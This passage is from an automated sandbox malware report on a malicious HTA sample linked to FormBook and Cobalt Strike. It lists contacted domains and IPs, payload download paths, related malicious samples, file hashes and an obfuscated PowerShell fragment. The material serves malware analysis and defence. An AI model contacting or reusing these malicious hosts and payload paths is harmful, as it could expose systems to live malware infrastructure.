                                                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.wofflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.inastra.online/__media__/js/trademark.php?d=inastra.online&type=nslSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            http://www.inastra.online/2019_Toyota_Land_Cruiser.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.onlinelSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.microsoft.cjzpowershell.exe, 00000003.00000002.2203096096.0000000008A06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://microsoft.coXpowershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.qmmkl.buzzlSomfUdjbC.exe, 0000000C.00000002.4516216085.0000000006C64000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.csslSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://i1.cdn-image.com/__media__/js/min.js?v2.3lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://crl.microspowershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    62.149.128.40
                                                                                                                                                    chalet-tofane.netItaly
                                                                                                                                                    31034ARUBA-ASNITtrue
                                                                                                                                                    104.21.31.249
                                                                                                                                                    www.aaavvejibej.bondUnited States
                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                    172.245.123.3
                                                                                                                                                    unknownUnited States
                                                                                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                                                                                    154.82.100.177
                                                                                                                                                    wmnfkj.a.1112dns.comSeychelles
                                                                                                                                                    32708ROOTNETWORKSUStrue
                                                                                                                                                    199.115.230.222
                                                                                                                                                    www.qmmkl.buzzCanada
                                                                                                                                                    25820IT7NETCAtrue
                                                                                                                                                    208.91.197.27
                                                                                                                                                    www.inastra.onlineVirgin Islands (BRITISH)
                                                                                                                                                    40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                    162.213.249.216
                                                                                                                                                    www.tophcom.onlineUnited States
                                                                                                                                                    22612NAMECHEAP-NETUStrue
                                                                                                                                                    3.33.130.190
                                                                                                                                                    deikamalaharris.infoUnited States
                                                                                                                                                    8987AMAZONEXPANSIONGBtrue
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1568883
                                                                                                                                                    Start date and time:2024-12-05 05:37:06 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 10m 42s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:16
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.phis.troj.spyw.expl.evad.winHTA@21/17@12/8
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 83.3%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 90%
                                                                                                                                                    • Number of executed functions: 88
                                                                                                                                                    • Number of non-executed functions: 272
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .hta
                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.203.160.36
                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 5440 because there are no executed function
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    23:37:53API Interceptor112x Sleep call for process: powershell.exe modified
                                                                                                                                                    23:39:13API Interceptor10282962x Sleep call for process: ieUnatt.exe modified
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    62.149.128.40seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                    • www.chalet-tofane.net/obbp/
                                                                                                                                                    alWUxZvrvU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.admaioraluxury.com/sumy/
                                                                                                                                                    Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.chalet-tofane.net/vv4m/?7NP=7FXXUPl&EZ2lo=YHtjADYkxu7EjL2CugAOyFkd+FKjIe5l/QKXGaE9Itky6wrTEgv0uDMpgH/UthNzfFIQLoI7VSX8KaEEAmnqI9GcxpfDY6d99mE8V8mh5Ak2zhlphg==
                                                                                                                                                    SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.chalet-tofane.net/obbp/
                                                                                                                                                    List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                    • www.chalet-tofane.net/ytc6/
                                                                                                                                                    Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.chalet-tofane.net/uesf/
                                                                                                                                                    PO76389.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.fimgroup.net/f3w9/
                                                                                                                                                    bintoday1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.fimgroup.net/m3ft/
                                                                                                                                                    Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.fimgroup.net/fqzh/
                                                                                                                                                    file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
                                                                                                                                                    104.21.31.249PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      172.245.123.3RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 172.245.123.3/2722/seenbestexepreiencednewthingscomingoninsidethegreat.tIF
                                                                                                                                                      Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 172.245.123.3/41/seethebestthingswhichgivingbestthignsevertogetmebackwithenitretimegiv.tIF
                                                                                                                                                      154.82.100.177seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                      • www.yu12345.xyz/mnl8/
                                                                                                                                                      PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • www.yu12345.xyz/jdq1/
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      www.inastra.onlineSGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      PO098765678.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 208.91.197.27
                                                                                                                                                      www.aaavvejibej.bondSGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 104.21.31.249
                                                                                                                                                      seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      JsPTv7s4Fn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.181.150
                                                                                                                                                      PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 104.21.31.249
                                                                                                                                                      www.qmmkl.buzzseethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                      • 199.115.230.222
                                                                                                                                                      aHGC2Dlox7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 199.115.230.222
                                                                                                                                                      SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 199.115.230.222
                                                                                                                                                      wmnfkj.a.1112dns.comseethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                      • 154.82.100.177
                                                                                                                                                      PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 154.82.100.177
                                                                                                                                                      www.tophcom.onlinerHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 162.213.249.216
                                                                                                                                                      seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                      • 162.213.249.216
                                                                                                                                                      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 162.213.249.216
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.21.16.9
                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.21.16.9
                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.165.166
                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.21.43.156
                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.165.166
                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.165.166
                                                                                                                                                      Doc Copy-PTD- P2139 INV- P2238.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.21.63.221
                                                                                                                                                      rdpguard-9-7-9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.165.166
                                                                                                                                                      vortex.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                      • 104.20.3.235
                                                                                                                                                      ARUBA-ASNITItelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 80.211.49.112
                                                                                                                                                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 62.149.187.171
                                                                                                                                                      sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                      • 94.177.220.125
                                                                                                                                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 217.61.126.234
                                                                                                                                                      apep.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 94.177.220.128
                                                                                                                                                      Delivery_Notification_00116030.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 89.46.105.77
                                                                                                                                                      https://urlsand.esvalabs.com/?u=https%3A%2F%2Fwww.google.es%2Furl%3Fq%3Dquerydvj3%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253D%26sa%3Dt%26url%3Damp%252fsafrareal.com.br%252fyoya%252fcwvw6vvf1g5bqgkdfsxdiiczthvxp3de8xxbs%2FcG1lQGZlZGVnYXJpYXNpYS5jb20%3D%24%3F&e=24a2acfd&h=70c4a2f4&f=n&p=yGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 95.110.136.136
                                                                                                                                                      P52mX04112024145925383.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                      • 62.149.128.45
                                                                                                                                                      ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 62.149.128.45
                                                                                                                                                      nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                      • 46.37.10.251
                                                                                                                                                      AS-COLOCROSSINGUSDocument.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                      • 107.172.44.175
                                                                                                                                                      bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                                                                      • 107.172.44.175
                                                                                                                                                      nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                                      • 198.46.178.192
                                                                                                                                                      dgreatth.docGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 192.3.95.197
                                                                                                                                                      MdDRzxozMD.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.168.7.19
                                                                                                                                                      fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.168.7.19
                                                                                                                                                      boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      No context
                                                                                                                                                      No context
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (3312), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):154122
                                                                                                                                                      Entropy (8bit):3.797078519180834
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:AeCzex8lzZz7iH9LcVKCeCzex8lzZz7iH9LcVK0eCzex8lzZz7iH9LcVKv:rCq6byowtCq6byowXCq6byowv
                                                                                                                                                      MD5:36525DA89F51430CBE32984C7B02386C
                                                                                                                                                      SHA1:264C384FC9CC6A9653D89B1683B2CBA64FDDBDD3
                                                                                                                                                      SHA-256:291D319C93575A83DA2C4F10F34848CAA5CED7996D433BDA9A713C5ABE4E418A
                                                                                                                                                      SHA-512:26AC864262759E211F33E8EEBA219856A82C9C721B0A69D989E59632B415531C05B547A348B3C29D7B4C9B3AC2050B93EB58D0FE3CBFC10AEA9ABA71D79C2455
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...... . . . .....B.b.q.L.L.G.m.L.W.Q.a.O.G.J.K. .=. .".A.N.O.J.i.c.U.G.L.k.Z.L.G.t.e.".....h.L.z.K.c.c.P.g.N.Z.i.q.d.l.O. .=. .".Z.I.t.z.J.W.u.K.L.c.B.m.A.L.U.".....O.b.s.L.G.h.u.K.c.q.z.k.i.u.L. .=. .".i.W.l.W.m.G.z.r.c.r.s.k.e.o.U.".........I.c.h.L.p.N.P.k.L.c.i.H.s.P.L. .=. .".h.t.G.t.u.W.j.z.d.d.G.S.i.T.h.".....o.o.C.W.U.L.k.A.k.b.P.c.p.J.K. .=. .".L.p.m.C.z.r.u.m.L.C.W.B.U.G.i.".....e.x.R.o.W.Q.c.B.z.A.e.W.N.B.L. .=. .".K.i.B.J.e.L.x.x.L.W.v.W.L.q.q.".....L.e.H.K.c.L.H.k.z.h.h.R.e.h.o. .=. .".l.W.N.g.e.u.t.t.W.z.K.z.o.L.k.".....i.i.k.P.e.n.c.i.G.N.n.j.a.g.e. .=. .".W.R.q.m.k.z.U.R.i.K.x.f.e.K.B.".....L.A.d.s.L.k.Z.z.z.r.q.L.G.a.N. .=. .".R.b.c.N.Z.i.L.u.z.P.v.c.f.A.K.".....e.n.W.L.L.K.p.n.s.L.h.c.i.x.G. .=. .".L.O.W.p.q.n.p.p.k.C.i.Q.q.W.Z.".....P.c.c.n.u.W.U.k.G.L.a.L.Z.L.d. .=. .".b.p.i.k.G.W.i.i.L.i.k.W.a.e.U.".....N.C.P.C.x.L.W.U.B.L.R.J.x.v.c. .=. .".O.L.W.b.p.b.r.R.h.S.G.U.P.R.A.".....W.N.d.C.K.q.c.L.Z.d.L.N.h.p.I. .=. .".b.l.t.e.K.n.R.A.B.W.i.m.Q.n.L.".....W.x.U.J.i.i.e.c.
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5829
                                                                                                                                                      Entropy (8bit):4.901113710259376
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1144
                                                                                                                                                      Entropy (8bit):5.328291987572489
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:3sYgSKco4KmBs4RPT6BmFoUvjKTIKo+mZ9t7J0gt/NKM9r8Hd:fgSU4y4RQmFoULF+mZ9tK8NF9u
                                                                                                                                                      MD5:C793A31D0A54FF3F016E090006AEEDDE
                                                                                                                                                      SHA1:4FF9B5CE77734490A100FD0D2C58017D19E8B5F8
                                                                                                                                                      SHA-256:5C1A65AB2320546B489D20A3A5B2F6CD485235BD1D533D3DFD2AE1F8A5B01849
                                                                                                                                                      SHA-512:FA1A61BCA5810218CB8B4A8C09AC4EC66F4575AF3B92933909F4DEDF4A5564FD25BE6BC8F017A60952F03A11F505831AF9050CE5508171CD4A789015D497A759
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@...e.................................,..............@..........@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                                                      Process:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                      Category:dropped
